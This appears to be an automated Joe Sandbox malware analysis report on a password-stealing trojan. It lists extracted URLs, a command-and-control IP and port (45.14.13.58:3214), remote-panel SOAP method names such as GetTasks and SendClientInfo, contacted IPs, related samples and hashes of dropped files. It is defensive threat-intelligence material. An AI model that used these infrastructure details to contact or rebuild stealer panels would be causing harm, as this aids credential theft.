                                  http://www.geoplugin.net/json.gp?ip=https://api.ip.sb/geoipsecuritywaves-exchangeSecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.274704985.0000000005020000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://schemas.datacontract.orgSecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.271024426.000000000286B000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  https://api.ip.sb/geoipSecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.270731371.0000000002771000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  http://schemas.xmlsoap.org/soap/envelope/SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.270651781.00000000026E1000.00000004.00000001.sdmp, SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.271024426.000000000286B000.00000004.00000001.sdmpfalse
                                    high
                                    http://schemas.datacontract.org/2004/07/CONTEXT.Models.EnumsSecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.271024426.000000000286B000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://schemas.xmlsoap.org/soap/envelope/DSecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.270731371.0000000002771000.00000004.00000001.sdmpfalse
                                      high
                                      http://tempuri.org/SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.270651781.00000000026E1000.00000004.00000001.sdmp, SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.271024426.000000000286B000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://ns.adobe.c/gSecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000003.268740526.0000000008713000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      unknown
                                      https://wtfismyip.com/textSecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.270731371.0000000002771000.00000004.00000001.sdmpfalse
                                        high
                                        http://go.microsSecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.271024426.000000000286B000.00000004.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        unknown
                                        https://api.ipify.orgSecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.274704985.0000000005020000.00000004.00000001.sdmp, SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.270731371.0000000002771000.00000004.00000001.sdmpfalse
                                          high
                                          http://tempuri.org/IRemotePanel/GetTasksResponseSecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.270651781.00000000026E1000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://tempuri.org/IRemotePanel/SendClientInfoSecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.271024426.000000000286B000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.interoperabilitybridges.com/wmp-extension-for-chromeSecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.271024426.000000000286B000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          unknown
                                          http://ns.adobe.c/goSecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000003.256274496.0000000008701000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://fpdownload.macromedia.com/get/shockwave/default/english/win95nt/latest/Shockwave_Installer_SlSecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.271024426.000000000286B000.00000004.00000001.sdmp, SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.270853707.00000000027B2000.00000004.00000001.sdmpfalse
                                            high
                                            http://tempuri.org/0SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.270651781.00000000026E1000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://ns.adobe.cobjoSecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000003.256274496.0000000008701000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameSecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.270651781.00000000026E1000.00000004.00000001.sdmpfalse
                                              high
                                              http://forms.real.com/real/realone/download.html?type=rpsp_usSecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.271024426.000000000286B000.00000004.00000001.sdmpfalse
                                                high
                                                http://support.aSecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.271024426.000000000286B000.00000004.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                unknown
                                                http://tempuri.org/IRemotePanel/GetSettingsResponseSecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.270651781.00000000026E1000.00000004.00000001.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://45.14.13.58:3214SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.270651781.00000000026E1000.00000004.00000001.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://ipinfo.io/ip%appdata%SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.274704985.0000000005020000.00000004.00000001.sdmpfalse
                                                  high
                                                  http://api.ip.sbSecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.270752515.0000000002796000.00000004.00000001.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://tempuri.org/IRemotePanel/SendClientInfoResponseSecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.270651781.00000000026E1000.00000004.00000001.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exeSecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.271024426.000000000286B000.00000004.00000001.sdmp, SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.270853707.00000000027B2000.00000004.00000001.sdmpfalse
                                                    high
                                                    http://tempuri.org/IRemotePanel/GetTasksSecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.271024426.000000000286B000.00000004.00000001.sdmp, SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.270853707.00000000027B2000.00000004.00000001.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    https://icanhazip.com5https://wtfismyip.com/textChttp://bot.whatismyipaddress.com/3http://checkip.dySecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.274704985.0000000005020000.00000004.00000001.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://ns.adobe.cobjSecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000003.268740526.0000000008713000.00000004.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymousSecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.270651781.00000000026E1000.00000004.00000001.sdmpfalse
                                                      high
                                                      http://schemas.datacontract.org/2004/07/SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.271024426.000000000286B000.00000004.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      unknown
                                                      https://api.ip.sbSecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.270731371.0000000002771000.00000004.00000001.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://helpx.adSecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.271024426.000000000286B000.00000004.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://45.14.13.58:32144SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.271024426.000000000286B000.00000004.00000001.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.271024426.000000000286B000.00000004.00000001.sdmp, tmp2A87.tmp.1.drfalse
                                                        high
                                                        http://checkip.dyndns.orgSecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.270731371.0000000002771000.00000004.00000001.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://tempuri.org/IRemotePanel/CompleteTaskResponseSecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.270651781.00000000026E1000.00000004.00000001.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://search.yahoo.com/favicon.icohttps://search.yahoo.com/searchSecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.271024426.000000000286B000.00000004.00000001.sdmp, tmp2A87.tmp.1.drfalse
                                                          high
                                                          http://bot.whatismyipaddress.com/SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.270731371.0000000002771000.00000004.00000001.sdmpfalse
                                                            high
                                                            https://get.adobSecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.271024426.000000000286B000.00000004.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            unknown
                                                            https://ac.ecosia.org/autocomplete?q=SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.271024426.000000000286B000.00000004.00000001.sdmp, tmp2A87.tmp.1.drfalse
                                                              high
                                                              http://service.real.com/realplayer/security/02062012_player/en/SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.271024426.000000000286B000.00000004.00000001.sdmpfalse
                                                                high
                                                                http://schemas.xmlsoap.org/ws/2004/08/addressingSecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.270651781.00000000026E1000.00000004.00000001.sdmpfalse
                                                                  high
                                                                  http://forms.reaSecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.271024426.000000000286B000.00000004.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  http://tempuri.org/IRemotePanel/CompleteTaskSecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.270651781.00000000026E1000.00000004.00000001.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  http://crl4.digSecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.275112004.00000000058E5000.00000004.00000001.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  http://tempuri.org/IRemotePanel/GetSettingsSecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.270651781.00000000026E1000.00000004.00000001.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://duckduckgo.com/chrome_newtabtSecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.271024426.000000000286B000.00000004.00000001.sdmpfalse
                                                                    high
                                                                    http://ns.ado/1oSecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000003.256274496.0000000008701000.00000004.00000001.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.271024426.000000000286B000.00000004.00000001.sdmp, tmp2A87.tmp.1.drfalse
                                                                      high
                                                                      http://schemas.xmlsoap.org/soap/actor/nextSecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.270651781.00000000026E1000.00000004.00000001.sdmpfalse
                                                                        high
                                                                        http://schemas.xmlsoap.org/ws/2004/08/addressing/faultDSecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.270651781.00000000026E1000.00000004.00000001.sdmpfalse
                                                                          high
                                                                          http://ns.ado/1SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000003.268740526.0000000008713000.00000004.00000001.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          unknown
                                                                          https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.271024426.000000000286B000.00000004.00000001.sdmp, tmp2A87.tmp.1.drfalse
                                                                            high

                                                                            Contacted IPs

                                                                            • No. of IPs < 25%
                                                                            • 25% < No. of IPs < 50%
                                                                            • 50% < No. of IPs < 75%
                                                                            • 75% < No. of IPs

                                                                            Public

                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                            192.0.47.59
                                                                            unknownUnited States
                                                                            16876ICANN-DCUSfalse
                                                                            45.14.13.58
                                                                            unknownNetherlands
                                                                            204601ON-LINE-DATAServerlocation-NetherlandsDrontenNLfalse

                                                                            General Information

                                                                            Joe Sandbox Version:31.0.0 Emerald
                                                                            Analysis ID:356847
                                                                            Start date:23.02.2021
                                                                            Start time:17:47:00
                                                                            Joe Sandbox Product:CloudBasic
                                                                            Overall analysis duration:0h 7m 3s
                                                                            Hypervisor based Inspection enabled:false
                                                                            Report type:light
                                                                            Sample file name:SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.25862 (renamed file extension from 25862 to exe)
                                                                            Cookbook file name:default.jbs
                                                                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                            Number of analysed new started processes analysed:26
                                                                            Number of new started drivers analysed:0
                                                                            Number of existing processes analysed:0
                                                                            Number of existing drivers analysed:0
                                                                            Number of injected processes analysed:0
                                                                            Technologies:
                                                                            • HCA enabled
                                                                            • EGA enabled
                                                                            • HDC enabled
                                                                            • AMSI enabled
                                                                            Analysis Mode:default
                                                                            Analysis stop reason:Timeout
                                                                            Detection:MAL
                                                                            Classification:mal88.troj.spyw.evad.winEXE@1/21@3/2
                                                                            EGA Information:Failed
                                                                            HDC Information:
                                                                            • Successful, ratio: 5.3% (good quality ratio 5.1%)
                                                                            • Quality average: 83.8%
                                                                            • Quality standard deviation: 25.1%
                                                                            HCA Information:
                                                                            • Successful, ratio: 100%
                                                                            • Number of executed functions: 0
                                                                            • Number of non-executed functions: 0
                                                                            Cookbook Comments:
                                                                            • Adjust boot time
                                                                            • Enable AMSI
                                                                            Warnings:
                                                                            Show All
                                                                            • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                                            • TCP Packets have been reduced to 100
                                                                            • Excluded IPs from analysis (whitelisted): 13.64.90.137, 104.42.151.234, 23.211.6.115, 104.43.193.48, 168.61.161.212, 40.88.32.150, 104.43.139.144, 104.26.12.31, 104.26.13.31, 172.67.75.172, 184.30.20.56, 51.104.139.180, 2.20.142.210, 2.20.142.209, 52.155.217.156, 20.54.26.129, 92.122.213.247, 92.122.213.194
                                                                            • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, arc.msn.com.nsatc.net, store-images.s-microsoft.com-c.edgekey.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, skypedataprdcoleus15.cloudapp.net, audownload.windowsupdate.nsatc.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, skypedataprdcolwus17.cloudapp.net, api.ip.sb.cdn.cloudflare.net, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, a767.dscg3.akamai.net, skypedataprdcolcus15.cloudapp.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus16.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                            • Report size getting too big, too many NtQueryValueKey calls found.

                                                                            Simulations

                                                                            Behavior and APIs

                                                                            TimeTypeDescription
                                                                            17:48:12API Interceptor64x Sleep call for process: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe modified

                                                                            Joe Sandbox View / Context

                                                                            IPs

                                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                            192.0.47.598TD8GfTtaW.exeGet hashmaliciousBrowse
                                                                              kmU6NKmBPV.exeGet hashmaliciousBrowse
                                                                                AHfG1a8jFs.exeGet hashmaliciousBrowse
                                                                                  ydQ0ICWj5v.exeGet hashmaliciousBrowse
                                                                                    r4yGYPyWb7.exeGet hashmaliciousBrowse
                                                                                      aif9fEvN5g.exeGet hashmaliciousBrowse
                                                                                        ProtonVPN.exeGet hashmaliciousBrowse
                                                                                          bZ9avvcHvE.exeGet hashmaliciousBrowse
                                                                                            CmJ6qDTzvM.exeGet hashmaliciousBrowse
                                                                                              RRLrVfeAXb.exeGet hashmaliciousBrowse
                                                                                                m3eJIFyc68.exeGet hashmaliciousBrowse
                                                                                                  7E6gDkEV97.exeGet hashmaliciousBrowse
                                                                                                    Dmjsru7tdt.exeGet hashmaliciousBrowse
                                                                                                      5FKzdCQAY0.exeGet hashmaliciousBrowse
                                                                                                        mq28SXD6jb.exeGet hashmaliciousBrowse
                                                                                                          w4XSMSClXm.exeGet hashmaliciousBrowse
                                                                                                            UJuYMehogg.exeGet hashmaliciousBrowse
                                                                                                              ITZ5fvovia.exeGet hashmaliciousBrowse
                                                                                                                BcSLaQV3wf.exeGet hashmaliciousBrowse
                                                                                                                  45EUwtDW2Q.exeGet hashmaliciousBrowse

                                                                                                                    Domains

                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                    ianawhois.vip.icann.orgSecuriteInfo.com.Trojan.GenericKD.45754886.17334.exeGet hashmaliciousBrowse
                                                                                                                    • 192.0.47.59
                                                                                                                    1vuet1S3tI.exeGet hashmaliciousBrowse
                                                                                                                    • 192.0.47.59
                                                                                                                    seed.exeGet hashmaliciousBrowse
                                                                                                                    • 192.0.47.59
                                                                                                                    SecuriteInfo.com.Trojan.GenericKDZ.73123.31244.exeGet hashmaliciousBrowse
                                                                                                                    • 192.0.47.59
                                                                                                                    8WjU4jrBIr.exeGet hashmaliciousBrowse
                                                                                                                    • 192.0.47.59
                                                                                                                    8TD8GfTtaW.exeGet hashmaliciousBrowse
                                                                                                                    • 192.0.47.59
                                                                                                                    kmU6NKmBPV.exeGet hashmaliciousBrowse
                                                                                                                    • 192.0.47.59
                                                                                                                    AHfG1a8jFs.exeGet hashmaliciousBrowse
                                                                                                                    • 192.0.47.59
                                                                                                                    ydQ0ICWj5v.exeGet hashmaliciousBrowse
                                                                                                                    • 192.0.47.59
                                                                                                                    r4yGYPyWb7.exeGet hashmaliciousBrowse
                                                                                                                    • 192.0.47.59
                                                                                                                    aif9fEvN5g.exeGet hashmaliciousBrowse
                                                                                                                    • 192.0.47.59
                                                                                                                    ProtonVPN.exeGet hashmaliciousBrowse
                                                                                                                    • 192.0.47.59
                                                                                                                    bZ9avvcHvE.exeGet hashmaliciousBrowse
                                                                                                                    • 192.0.47.59
                                                                                                                    CmJ6qDTzvM.exeGet hashmaliciousBrowse
                                                                                                                    • 192.0.47.59
                                                                                                                    RRLrVfeAXb.exeGet hashmaliciousBrowse
                                                                                                                    • 192.0.47.59
                                                                                                                    m3eJIFyc68.exeGet hashmaliciousBrowse
                                                                                                                    • 192.0.47.59
                                                                                                                    7E6gDkEV97.exeGet hashmaliciousBrowse
                                                                                                                    • 192.0.47.59
                                                                                                                    Dmjsru7tdt.exeGet hashmaliciousBrowse
                                                                                                                    • 192.0.47.59
                                                                                                                    5FKzdCQAY0.exeGet hashmaliciousBrowse
                                                                                                                    • 192.0.47.59
                                                                                                                    mq28SXD6jb.exeGet hashmaliciousBrowse
                                                                                                                    • 192.0.47.59

                                                                                                                    ASN

                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                    ICANN-DCUS8TD8GfTtaW.exeGet hashmaliciousBrowse
                                                                                                                    • 192.0.47.59
                                                                                                                    kmU6NKmBPV.exeGet hashmaliciousBrowse
                                                                                                                    • 192.0.47.59
                                                                                                                    AHfG1a8jFs.exeGet hashmaliciousBrowse
                                                                                                                    • 192.0.47.59
                                                                                                                    ydQ0ICWj5v.exeGet hashmaliciousBrowse
                                                                                                                    • 192.0.47.59
                                                                                                                    r4yGYPyWb7.exeGet hashmaliciousBrowse
                                                                                                                    • 192.0.47.59
                                                                                                                    aif9fEvN5g.exeGet hashmaliciousBrowse
                                                                                                                    • 192.0.47.59
                                                                                                                    ProtonVPN.exeGet hashmaliciousBrowse
                                                                                                                    • 192.0.47.59
                                                                                                                    bZ9avvcHvE.exeGet hashmaliciousBrowse
                                                                                                                    • 192.0.47.59
                                                                                                                    CmJ6qDTzvM.exeGet hashmaliciousBrowse
                                                                                                                    • 192.0.47.59
                                                                                                                    RRLrVfeAXb.exeGet hashmaliciousBrowse
                                                                                                                    • 192.0.47.59
                                                                                                                    m3eJIFyc68.exeGet hashmaliciousBrowse
                                                                                                                    • 192.0.47.59
                                                                                                                    7E6gDkEV97.exeGet hashmaliciousBrowse
                                                                                                                    • 192.0.47.59
                                                                                                                    Dmjsru7tdt.exeGet hashmaliciousBrowse
                                                                                                                    • 192.0.47.59
                                                                                                                    5FKzdCQAY0.exeGet hashmaliciousBrowse
                                                                                                                    • 192.0.47.59
                                                                                                                    mq28SXD6jb.exeGet hashmaliciousBrowse
                                                                                                                    • 192.0.47.59
                                                                                                                    w4XSMSClXm.exeGet hashmaliciousBrowse
                                                                                                                    • 192.0.47.59
                                                                                                                    UJuYMehogg.exeGet hashmaliciousBrowse
                                                                                                                    • 192.0.47.59
                                                                                                                    ITZ5fvovia.exeGet hashmaliciousBrowse
                                                                                                                    • 192.0.47.59
                                                                                                                    BcSLaQV3wf.exeGet hashmaliciousBrowse
                                                                                                                    • 192.0.47.59
                                                                                                                    45EUwtDW2Q.exeGet hashmaliciousBrowse
                                                                                                                    • 192.0.47.59
                                                                                                                    ON-LINE-DATAServerlocation-NetherlandsDrontenNLMPC-PU-FO-0011-00 .exeGet hashmaliciousBrowse
                                                                                                                    • 185.206.215.56
                                                                                                                    GUYj2SmNlt.exeGet hashmaliciousBrowse
                                                                                                                    • 185.206.212.86
                                                                                                                    k2kGj2iF4F.exeGet hashmaliciousBrowse
                                                                                                                    • 185.206.212.86
                                                                                                                    AOMuUhpLtl.exeGet hashmaliciousBrowse
                                                                                                                    • 185.206.212.86
                                                                                                                    dAIyRK9gO7.exeGet hashmaliciousBrowse
                                                                                                                    • 212.86.114.14
                                                                                                                    HpHQe9KGzT.exeGet hashmaliciousBrowse
                                                                                                                    • 92.119.113.254
                                                                                                                    SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exeGet hashmaliciousBrowse
                                                                                                                    • 212.86.114.14
                                                                                                                    #U10e1#U10d0#U10e4#U10e0#U10d0#U10dc#U10d2#U10d4#U10d7#U10d8.exeGet hashmaliciousBrowse
                                                                                                                    • 185.235.130.84
                                                                                                                    IMG_222446.docGet hashmaliciousBrowse
                                                                                                                    • 185.206.215.56
                                                                                                                    IMG_804941.docGet hashmaliciousBrowse
                                                                                                                    • 185.206.215.56
                                                                                                                    tyxCV1ouryr7.exeGet hashmaliciousBrowse
                                                                                                                    • 185.241.54.156
                                                                                                                    PO 9174-AR.docGet hashmaliciousBrowse
                                                                                                                    • 185.206.215.56
                                                                                                                    SecuriteInfo.com.Trojan.Packed2.42783.14273.exeGet hashmaliciousBrowse
                                                                                                                    • 185.206.215.56
                                                                                                                    P.O 119735.doc__.rtfGet hashmaliciousBrowse
                                                                                                                    • 185.206.215.56
                                                                                                                    SecuriteInfo.com.Trojan.Packed2.42783.32.exeGet hashmaliciousBrowse
                                                                                                                    • 185.206.215.56
                                                                                                                    IMG_688031.docGet hashmaliciousBrowse
                                                                                                                    • 185.206.215.56
                                                                                                                    file.exeGet hashmaliciousBrowse
                                                                                                                    • 185.206.215.56
                                                                                                                    file.exeGet hashmaliciousBrowse
                                                                                                                    • 185.206.215.56
                                                                                                                    Shipping Document PL&BL Draft.exeGet hashmaliciousBrowse
                                                                                                                    • 92.119.115.38
                                                                                                                    Cena upit AA008957 01-21-2021.docGet hashmaliciousBrowse
                                                                                                                    • 80.89.229.149

                                                                                                                    JA3 Fingerprints

                                                                                                                    No context

                                                                                                                    Dropped Files

                                                                                                                    No context

                                                                                                                    Created / dropped Files

                                                                                                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe.log
                                                                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe
                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):2599
                                                                                                                    Entropy (8bit):5.332456341785073
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:48:MIHK5HKXwYHKhQnogLHqHDfHKdHKBfHK5AHKzvQTHmtHoxHImHKhBHKoHaHZHG1h:Pq5qXwYqhQnogLKTqdqNq2qzcGtIxHbG
                                                                                                                    MD5:B3B393A27780DA48DF5CD4FAE3191588
                                                                                                                    SHA1:0526E4A07EF053DCB6D5713C4171F1B1063B3359
                                                                                                                    SHA-256:AF9812C86F70E2FA3583EF2A2E37D7B7E2D6B2CE73710980E8B48F489AA1AA3D
                                                                                                                    SHA-512:3AABD17235B5B5AAACB017450FF9ECFC8F9C4338E0EFC2D55AC40D048266C46A44CA29C825F7E237CABEC1345F60E3F53330ADFFBF411C238D7901CC869637B1
                                                                                                                    Malicious:true
                                                                                                                    Reputation:low
                                                                                                                    Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..2,"Microsoft.CSharp, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Dynamic, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.ServiceModel, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Runteb92aa12#\34957343ad5d84daee97a1affda91665\Syst
                                                                                                                    C:\Users\user\AppData\Local\Temp\tmp2A54.tmp
                                                                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe
                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):73728
                                                                                                                    Entropy (8bit):1.1874185457069584
                                                                                                                    Encrypted:false
